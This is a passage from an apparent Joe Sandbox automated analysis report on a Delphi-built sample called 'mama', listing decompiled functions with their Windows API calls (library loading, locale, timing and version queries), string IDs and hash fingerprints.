                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,02F7DEFB,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,02F7DFD9), ref: 02F7DBE1
                                                          • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 02F7DBF2
                                                          • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?,?,02F7DEFB,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?), ref: 02F7DCF2
                                                          • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?,?,02F7DEFB,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019), ref: 02F7DD04
                                                          • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?,?,02F7DEFB,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales,00000000), ref: 02F7DD10
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?,?,02F7DEFB,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales), ref: 02F7DD55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                          • String ID: GetLongPathNameW$\$kernel32.dll
                                                          • API String ID: 1930782624-3908791685
                                                          • Opcode ID: 09fc5b0110bcdddf286d00de5964ddd207e0bcdae1469d3386ae4a29398b7da0
                                                          • Instruction ID: 330402b4cffd43293f62f5e74a57b23784edfc29915f696093f471612488af39
                                                          • Opcode Fuzzy Hash: 09fc5b0110bcdddf286d00de5964ddd207e0bcdae1469d3386ae4a29398b7da0
                                                          • Instruction Fuzzy Hash: C341C571E006189BCB10EBA8CD84BDDB3B6EF45390F9485A6CA05E7254E7B4EE45CF44
                                                          Function 03435920 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,03435B9D), ref: 0343594B
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,03435B9D), ref: 03435975
                                                          • LoadLibraryW.KERNEL32(ntdll.dll,RtlGetVersion,00000000,03435AD5,?,?,?,?,?,?,03435B9D), ref: 034359C2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Version$LibraryLoad
                                                          • String ID: RtlGetVersion$ntdll.dll
                                                          • API String ID: 192404683-1489217083
                                                          • Opcode ID: 1997ee769154486f11bdbda70b30946754becee3750e62dc6210cf85d486c187
                                                          • Instruction ID: c48e3d4d54ebaf09159b181314430b776910832cf0228472c35195f515db4e07
                                                          • Opcode Fuzzy Hash: 1997ee769154486f11bdbda70b30946754becee3750e62dc6210cf85d486c187
                                                          • Instruction Fuzzy Hash: 8951C034A14208EFCB14EBA8C985ADEB7F5EF4A310F6584E6E808AB351D3309F40DB54
                                                          Function 02F7D768 Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsValidLocale.KERNEL32(?,00000002,00000000,02F7D8CD,?,?,?,00000000), ref: 02F7D812
                                                          • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,02F7D8CD,?,?,?,00000000), ref: 02F7D82E
                                                          • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,02F7D8CD,?,?,?,00000000), ref: 02F7D83F
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Locale$Info$Valid
                                                          • String ID:
                                                          • API String ID: 1826331170-0
                                                          • Opcode ID: 80157ba6ce29966bdb95830b7760723fe0ad6737fb6cd80e85440df6e985aba6
                                                          • Instruction ID: 5c1b868ff43b729b651bae9cdd4f053538357d695fd8dcb41623698b57124b42
                                                          • Opcode Fuzzy Hash: 80157ba6ce29966bdb95830b7760723fe0ad6737fb6cd80e85440df6e985aba6
                                                          • Instruction Fuzzy Hash: 14318D75A0061CAAEB20EF64DD80FDEB7BAFF44B41F8004A6E609A7290D7355E81CE11
                                                          Function 0311C878 Relevance: 42.1, APIs: 12, Strings: 12, Instructions: 112libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(user32.dll), ref: 0311C8ED
                                                          • LoadLibraryW.KERNEL32(ntdll.dll,user32.dll), ref: 0311C909
                                                          • LoadLibraryW.KERNEL32(advapi32.dll,ntdll.dll,user32.dll), ref: 0311C925
                                                          • LoadLibraryW.KERNEL32(shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C941
                                                          • LoadLibraryW.KERNEL32(ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C95D
                                                          • LoadLibraryW.KERNEL32(ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C979
                                                          • LoadLibraryW.KERNEL32(wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C995
                                                          • LoadLibraryW.KERNEL32(wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C9AE
                                                          • LoadLibraryW.KERNEL32(crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C9C7
                                                          • LoadLibraryW.KERNEL32(PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C9E0
                                                          • LoadLibraryW.KERNEL32(gdi32.dll,PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C9F9
                                                          • LoadLibraryW.KERNEL32(Iphlpapi.dll,gdi32.dll,PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311CA12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: Iphlpapi.dll$PSAPI.dll$advapi32.dll$crypt32.dll$gdi32.dll$ntdll.dll$ole32.dll$shell32.dll$user32.dll$wininet.dll$ws2_32.dll$wtsapi32.dll
                                                          • API String ID: 1029625771-1098239973
                                                          • Opcode ID: 034d0f67040dac28d55821d82d3025a9949c2bde22dcd936a0c0955d28018674
                                                          • Instruction ID: e41b28c463b84259d053486f70487a35a56866b0c3eeb20262b65ab477216230
                                                          • Opcode Fuzzy Hash: 034d0f67040dac28d55821d82d3025a9949c2bde22dcd936a0c0955d28018674
                                                          • Instruction Fuzzy Hash: 6841C274986318EFC741EFA8E941ADCBBF5EB0D781B5090A6E406FB214E3705A50DF90
                                                          Function 02F7DA80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB,?,?,00000000,00000000,00000000), ref: 02F7DA9E
                                                          • LeaveCriticalSection.KERNEL32(034AEC14,034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB,?,?,00000000,00000000), ref: 02F7DAC2
                                                          • LeaveCriticalSection.KERNEL32(034AEC14,034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB,?,?,00000000,00000000), ref: 02F7DAD1
                                                          • IsValidLocale.KERNEL32(00000000,00000002,034AEC14,034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB), ref: 02F7DAE3
                                                          • EnterCriticalSection.KERNEL32(034AEC14,00000000,00000002,034AEC14,034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB), ref: 02F7DB40
                                                          • LeaveCriticalSection.KERNEL32(034AEC14,034AEC14,00000000,00000002,034AEC14,034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB), ref: 02F7DB69
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                          • String ID: en-GB,en,en-US,
                                                          • API String ID: 975949045-3021119265
                                                          • Opcode ID: da5e53c0384a2c811fce72c608ce571adc397556a040f38ccc731a87a85ed60e
                                                          • Instruction ID: 7827a057084eedca8789128fe047a0e62db3411f64af35e84f0385c8bff6a24c
                                                          • Opcode Fuzzy Hash: da5e53c0384a2c811fce72c608ce571adc397556a040f38ccc731a87a85ed60e
                                                          • Instruction Fuzzy Hash: 9E21AF20B006049AEB11B67C9D51A1E369BEF46BC4FD04427E7109F245DBA58C81CAAB
                                                          Function 02F787A8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 02F787BD
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 02F787C3
                                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 02F787D6
                                                          • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 02F787DF
                                                          • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,02F78856,?,00000000,?,GetLogicalProcessorInformation), ref: 02F7880A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                          • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                          • API String ID: 1184211438-79381301
                                                          • Opcode ID: c58b1fb6ec5969133533e697b30ff97e666b36ebe49b0cae916a70b55bb37f43
                                                          • Instruction ID: b5188e5ca3d9260e6941ee1e0733ef72b53dccc5e5b378f59f43b3f440bd5943
                                                          • Opcode Fuzzy Hash: c58b1fb6ec5969133533e697b30ff97e666b36ebe49b0cae916a70b55bb37f43
                                                          • Instruction Fuzzy Hash: 25117F71D00208AEEB10EBE5DC08F9DB7BAEB403C0F5484ABEA2497541D7B4CA40DF51
                                                          Function 02F817B0 Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02F81868
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: afd356a106eb3d7ed50025bf40cbd4cc4ffe5bff902f208bd71fb53f9c7337d6
                                                          • Instruction ID: c507734907a3a5922b11a020757f102033150de19661e4bc5fef38a2a199d22f
                                                          • Opcode Fuzzy Hash: afd356a106eb3d7ed50025bf40cbd4cc4ffe5bff902f208bd71fb53f9c7337d6
                                                          • Instruction Fuzzy Hash: 73A17075E016099FDB10EFE8D980BEFF7F5AB48390F144219E609AB294D770A946CB60
                                                          Function 02F78A30 Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02F78EBC: GetCurrentThreadId.KERNEL32 ref: 02F78EBF
                                                          • GetTickCount.KERNEL32 ref: 02F78A67
                                                          • GetTickCount.KERNEL32 ref: 02F78A7F
                                                          • GetCurrentThreadId.KERNEL32 ref: 02F78AAE
                                                          • GetTickCount.KERNEL32 ref: 02F78AD9
                                                          • GetTickCount.KERNEL32 ref: 02F78B10
                                                          • GetTickCount.KERNEL32 ref: 02F78B3A
                                                          • GetCurrentThreadId.KERNEL32 ref: 02F78BAA
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountTick$CurrentThread
                                                          • String ID:
                                                          • API String ID: 3968769311-0
                                                          • Opcode ID: 808c6fd08485a81c8a8c0e6529a11b52396ffda439972847fb95b81c9384597e
                                                          • Instruction ID: 81e507f9043091fd32d9ed5af1e9a959bc55a76dc3278cbdf7d7ae96b670451f
                                                          • Opcode Fuzzy Hash: 808c6fd08485a81c8a8c0e6529a11b52396ffda439972847fb95b81c9384597e
                                                          • Instruction Fuzzy Hash: 91416471A083419EE721EE7CC98831EBBD2AF843D4F188D6ED6D887291E774D484DB52
                                                          Function 02F79AF4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,02F79BB2,?,?,00000000,00000000,02F79CC6,02F79CE0,?,?,02F811E8), ref: 02F79B2D
                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,02F79BB2,?,?,00000000,00000000,02F79CC6,02F79CE0), ref: 02F79B33
                                                          • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,02F79BB2,?,?,00000000), ref: 02F79B4E
                                                          • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,02F79BB2,?,?), ref: 02F79B54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileHandleWrite
                                                          • String ID: Error$Runtime error at 00000000
                                                          • API String ID: 3320372497-2970929446
                                                          • Opcode ID: 676d6df6f7dd37ef5790feae419778d9dc429a990dcd9e75e6b20ed394f7cf4f
                                                          • Instruction ID: 5d9c4c607ed35c1c3d52523d57f80cd50fafdc9b3da890d805a045e421968b73
                                                          • Opcode Fuzzy Hash: 676d6df6f7dd37ef5790feae419778d9dc429a990dcd9e75e6b20ed394f7cf4f
                                                          • Instruction Fuzzy Hash: 87F0F6E4B4430479F650B7A89D86F6E36D99748F95F900107B760ED0C9C7E449C48F62
                                                          Function 0311C800 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 10libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(user32.dll,03460B3B,00000000,03460EDA), ref: 0311C805
                                                          • LoadLibraryW.KERNEL32(kernel32.dll,user32.dll,03460B3B,00000000,03460EDA), ref: 0311C814
                                                          • LoadLibraryW.KERNEL32(ntdll.dll,kernel32.dll,user32.dll,03460B3B,00000000,03460EDA), ref: 0311C823
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: kernel32.dll$ntdll.dll$user32.dll
                                                          • API String ID: 1029625771-3818928520
                                                          • Opcode ID: b39df5586b841658612553ded2a1f26910a70a207e6aa62cc987c25ca983de3f
                                                          • Instruction ID: 39266c513b64de13d29933d657c2fab6a8d152bedeb1d3337221305b7c00029f
                                                          • Opcode Fuzzy Hash: b39df5586b841658612553ded2a1f26910a70a207e6aa62cc987c25ca983de3f
                                                          • Instruction Fuzzy Hash: 97C002A49923006FD350FB6498824ACB5D6E645F4274010A9A519BA129DBF004109FD1
                                                          Function 02F7D964 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetThreadUILanguage.KERNEL32(?,00000000), ref: 02F7D975
                                                          • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 02F7D9D3
                                                          • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 02F7DA30
                                                          • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 02F7DA63
                                                            • Part of subcall function 02F7D920: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,02F7D9E1), ref: 02F7D937
                                                            • Part of subcall function 02F7D920: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,02F7D9E1), ref: 02F7D954
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Thread$LanguagesPreferred$Language
                                                          • String ID:
                                                          • API String ID: 2255706666-0
                                                          • Opcode ID: 26f932bc4660dca1940e94ca74902650a2ea08db18fa187d72acddcfd5585018
                                                          • Instruction ID: d7f8830c4498711cac9808cbaef49be822d429827a09e9f5a469db0ec53550b2
                                                          • Opcode Fuzzy Hash: 26f932bc4660dca1940e94ca74902650a2ea08db18fa187d72acddcfd5585018
                                                          • Instruction Fuzzy Hash: C8316031E0021E9BEB10EFE8D884AEEB7B9FF04344F404566D665E7295DB749A44CB50